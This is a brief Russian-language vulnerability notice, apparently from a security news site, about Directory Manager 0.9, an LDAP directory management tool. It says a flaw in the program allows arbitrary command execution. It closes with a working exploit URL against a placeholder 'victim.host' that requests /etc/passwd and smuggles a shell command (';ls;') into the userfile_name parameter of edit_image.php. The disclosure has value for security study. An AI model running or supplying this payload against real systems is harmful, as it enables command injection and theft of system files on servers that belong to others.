Directory Manager - "фишка", которая руководит данными каталога LDAP. В его составе: независимый редактор, утилита для просмотра схем и некоторые виды данных. Уязвимость защиты в программе позволяет выполнить произвольную команду.
Уязвимость работает на Directory Manager версии 0.9
http://victim.host/edit_image.php?dn=1& userfile=/etc/passwd&userfile_name=%20;ls;%20
